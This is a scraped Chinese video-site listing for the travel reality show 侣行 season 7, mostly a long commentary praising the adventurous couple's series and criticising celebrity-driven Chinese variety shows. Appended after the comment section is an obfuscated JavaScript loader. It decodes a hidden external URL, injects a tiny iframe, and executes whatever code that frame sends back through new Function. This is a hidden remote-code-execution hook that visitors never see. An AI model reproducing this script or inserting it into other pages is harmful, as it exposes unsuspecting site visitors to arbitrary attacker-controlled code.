地球之极地球之极·侣行 第七季

  • 真人秀综艺 生活 社会 冒险
  • 张昕宇
  • 每期90分钟
  • 地球之极地球之极·侣行 第七季影片简介:大概是从20…地球之极地球之极·侣行 第七季影片简介:大概是从2013年韩版[爸爸去哪儿]上线开始,我朝的网络、电视综艺节目开启了很长一段时间的“明星旅行真人秀节目引进(chao xi)热潮”。 一直到今年,已经六年过去了,我朝综艺圈还没对这种题材感到厌烦,什么[小姐姐的花店]、[中餐厅2]……各类没有内涵的明星旅行节目依旧络绎不绝争相上线。 韩版[爸爸!我们去哪里]拍了两季就已经完结了,中国版的愣是拍了五季,据说第六季早也已经拍好了,只是因为政策原因延播了。 有趣的是,在2013同年,有一档旅游节目也上线了,这档节目完全是我朝自制,也曾在“小众范围内”火过一阵,在豆瓣的平均得分超过9.2。 但在以抄袭闻名的我朝综艺圈,却一直没人敢模仿。 是的,小E今天要聊的"不可复制"的节目或许“看电影“不少粉丝都看过,就是: [侣行]系列 [侣行]第一季海报 [侣行]系列是2013年开始更新的一档讲述了张昕宇(因为体重270斤,人送外号270)、梁红夫妇冒险旅行的真人秀节目,这个系列包括[侣行]第1、2、3季;[我们的侣行]第1、2季;[地球之极·侣行 ]第1、2季。其中[地球之极]第2季至今仍在更新。 侣行夫妇绝对是全中国最酷的CP了: 用无人机帮库尔德人定位了ISIS的军事基地,然后把基地炸毁了,被isis悬赏人头。复原米巴扬大佛,保护山地大猩猩,联合国都邀请他们去做演讲。 甚至当他俩在南极结婚的时候,德国总理默克尔都给他们发了贺电: “爱情不是两个人的深情对视,而是看向同一个远方。”有网友评论: 如果这两口子出生在宋朝 ,哪轮得到哥白尼发现美洲新大陆。 这对夫妻本是对热衷享乐的“暴发户”,但丈夫270在参加了汶川地震救灾过程中突然顿悟人生,认为“生命太脆弱,人生不能就这样平凡地再过下去”,于是与妻子梁红商量决定环球世界。 但作为暴发户,啥没体验过,他们可是曾为了吃一根香肠,飞去法国里昂某家小餐馆来上一根的人。所以,他们决定玩点不一样的: 于是,从2012年开始,他们把世界上最危险的地方都去了一遍:世界“寒极”奥伊米亚康、“危险之都”索马里首都摩加迪沙、切尔诺贝利核电站、马鲁姆火山……采访过战俘、与职业杀手聊过天、在火山口插过国旗、在“硫酸湖”上划过船、在北极求婚南极结婚…… 侣行夫妇把人生过成了一部浪漫主义冒险小说。 不夸张的说,无论是从内容的深度还是从社会意义来说,[侣行]系列都可以说是秒杀国内99%综艺节目的存在。 相比于国内大多数旅行节目,只会以全球各地的美景包裹空洞的鸡汤,呈现出小清新画面;[侣行]展现给观众的不仅是这个世界有多美,还有这个世界的“黑暗”以及底层的无奈: 比如那位20岁土耳其的土木工程专业大学生因为“宗教狂热”,而加入ISIS成为恐怖分子; 比如那位在哥伦比亚的杀手,年仅15岁,却已经背了6条人命; 以及那群生活在秘鲁的拉林科纳达的人们,他们守着世界最大银矿城市,却过着非常贫穷的生活,即使住在那里30%的人都是铅中毒患者,但为了生存他们却也没法让矿产公司门完全关闭,因为那样他们也就失业了…… 当地的涂鸦上写着:在这里每一口呼吸都是在战斗 那么问题来了,这个节目随便拿一集可都是很博眼球的,为什么没人敢“模仿”呢? 毕竟当年亲子节目火了以后,可是各大网络平台各大电视台可都是纷纷效仿,衍生出了“亲子旅行”“爸爸看孩子”“妈妈看孩子”“未婚青年看别人家孩子”等多种多样的亲子节目呢。 想来,最主要原因有三点: 第一,烧钱。 肯定有人要说了,现在综艺不都是动辄几千万、甚至上亿的投入,这算什么理由? 事实上,想要做出所谓的“现象级”综艺,的确都得过亿的投资,但这其中的大部分花销用在了“请明星”上。毕竟,流量得从“流量明星”身上赚回来。 早在2016年,芒果台的著名综艺导演谢涤葵(制作过爸爸去哪儿)就曾公开表示担忧: 通常投资一个亿的节目,大概有六七千万花要在明星身上。虽说从去年开始,明星的“天价出场费”已经被监管。但就算打个折,明星的费用依旧是综艺节目里最大头的支出。 提问:像跑男这类明星云集的节目,明星支出占节目制作费的比例是多少?正确答案是:别算了,算多了会仇富。 相比之下,[侣行]这么多季播下来,制作费绝对也超过了一个亿。 只是这份制作费,大多来自“自费”: 2008年,我和梁红做了一个10年的计划,用5年来筹备,用5年来环游世界。我们算了算多年的积蓄,定下了一个预算接近1亿的行走计划。比如一套北京三环附近的房子,换来了一架中国制造的运-12飞机,和一次环球飞行的旅程。2014年去南极,单是帆船也花了1200万港币。2015年穿越中东的费用更难以计算。我们并不排斥商业,也很感谢平台和许多赞助的支持。但这些远不足以Cover成本。(节选自知乎上问题:「侣行」夫妇(张昕宇、梁红)花了一亿人民币环球旅行有意义吗?张昕宇的回答)但也因为是“自费”,所以[侣行]里的侣行夫妇所有的行程更具自主性,没有所谓的“收视率”压力,因此我们看到了一个最纯粹的旅行节目。 一套北京三环附近的房子,换来了一架中国制造的运-12飞机,和一次环球飞行的旅程 至于第2个原因,则是有且只有一对的不可代替的侣行CP。 除了烧钱,节目主角们的能力,也是这个节目无法被模仿(抄袭)的原因。 现在的明星上真人秀综艺,大多还是以“滑水”地姿态在录节目。说白了就是“不专业”。 以近期讨论度比较高的爱奇艺节目[小姐姐的花店]为例。既然节目的主题是“开花店”,那么排除其他不说,至少明星们要先把花店开起来啊? 然而,我们在这个节目里却看到: 收银员宋佳明知道客人少给了钱,却“不好意思”去要;店员林彦俊一言不合就送花,从来不cover下成本问题;王琳凯更是毫无经验,有客人来买花,语言不通、手足无措,常常将客人晾在一旁;至于店长小S甚至忘记给客人收钱。感觉这个节目除了欧阳娜娜有在用心开花店,其他人都在神游。 并不是崇洋媚外,而是这些年,看原版韩国综艺常常会让人爱上某个明星生活里的真实模样,但看这些国内明星上综艺总会怀疑这些明星是不是连生活都不太能自理? 所以说呀,这些能力不太行的明星们,你怎么叫他们去冒险?弄不好连命都折进去了。 小S、宋佳离开花店,连门和灯都不关?这未免也对意大利治安太过自信了? 相比之下,看似不怕死的“侣行夫妇”却在能力训练上做到“最惜命的准备”: 为了能完成了中国制造的首个环球飞行(2017年,侣行夫妇驾驶由中航工业生产的运-12飞机,完成了中国制造的首个环球飞行),270考了飞机驾驶执照。之后,更是花了半年时间,在大兴安岭深处的密林上空练习飞行,包括7款固定翼飞机与2款直升机的驾驶; 再比如270在[锵锵三人行]里提到的潜水执照: 我们的训练取决于我们要做哪些事情。比如潜水,我拿的是水下深水焊接执照。为什么要这个执照呢,因为第二季有一站是去玛雅文明的探秘。墨西哥井底很多玛雅人民遗迹,但由于技术原因没有人下去过。我们是首波下去的人类。连主持人窦文涛听完都不禁感慨: 这五年,你们基本上对自己训练是007的训练。的确,在决定环游世界后,两人花了4年时间,拿下了帆船、直升机、滑翔伞等20多个证件。270此前几个月的准备,还包括研究破冰船、学习天体动力学、自制特斯拉线圈,在10平米的铁皮屋子中研究真空环境下金属颗粒的燃烧特性…… 怪不得梁红多次在公开场合表示:270是她最崇拜的人。跟着这样的老公去冒险,的确很令人安心。 [侣行]第二季,270下入井底发现:玛雅人竟然真的用活人少女祭祀一口井 最后,就要来说说这个节目无法被“抄袭”最可悲的原因了:不够火。 想来的确有点魔幻,在我朝衡量一个节目火不火,就看看它有没有被抄过。 虽然[侣行]在前三季的数据还不错,前三季全网播放量超20亿。甚至关于侣行夫妇,全球媒体报道超过1500家。然而,这火还是太过“小众”。 在豆瓣,[侣行]系列最火的第一季,但也才5000多人打过分,而最新的[地球之极·侣行]第二季已经更新三集了,至今却连评分都没有展示,因为打分的人实在太少了。 事实上,这几年我国综艺的确慢慢发展起来了,但不少畸形现象也伴随其中。 最典型的就是宣传不到位,再好的节目也没人看。 于是,我们看到了“梁文道”为了自己“理想国系列节目”到流量节目[奇葩说]当男神做宣传;我们还看到了[圆桌派][十三邀]这类人文谈话节目,常常是因为主持人被骂“直男癌”上了热搜才让更多的观众知道有这个节目;结合我们前面讨论的“明星问题”,虽然请明星很烧钱,但一个节目如果有流量明星出现,话题度的确是会高很多……总之,在当代中国综艺圈,无论这个节目做的好不好,只要火了就行,就算“黑红”,那也是吸睛的另一种形态。 当然了,造成这种情况,有整体综艺圈制作人员的责任,但也有很大一部分原因在于我国整体综艺收视人群的选择。 这几年从快手的火爆到抖音的视频的刷屏,都能在一定程度上说明,至少在近几年,能获得“高收视率”的东西,往往都不能太过“高深”。 相比于“世界的和平”,明星的绯闻,吃瓜群众更感兴趣。对于过分追求“收视率”的中国综艺圈,通过这样一分析,似乎[侣行]系列还能继续拍下去貌似已经很值得被感恩了。 虽然说,人的品味总会有一个向上的过程,但如果不加以引导,任由发展,让这种畸形的“节目观”一直延续下去,可以预料到等待我们未来孩子的节目会是:[跑男第88季]和[爸爸去哪儿之曾孙回来了]。 至于引导工作要交给谁,私以为,芒果台的这批综艺制作人们,我看好你们哦~下次买版权的时候,别只盯着国外节目,偶尔也可以抄一抄这些优秀的国内节目嘛!

同主演

    地球之极地球之极·侣行 第七季评论

    • 评论加载中...
    function NQoIX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function nHqeN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NQoIX(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x48\x49\x6f\x45\x47\x56\x4e\x6a\x6e']=function(){;(function(u,r,w,d,f,c){var x=nHqeN;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZtZWV0aGFuc2hppLmNvbSUyRjEzNjA5Mg==',''+'WfX'+'ORj'+'Hsl'+'d'+'',window,document,''+'ezR'+'xlj'+'cH'+'','p');};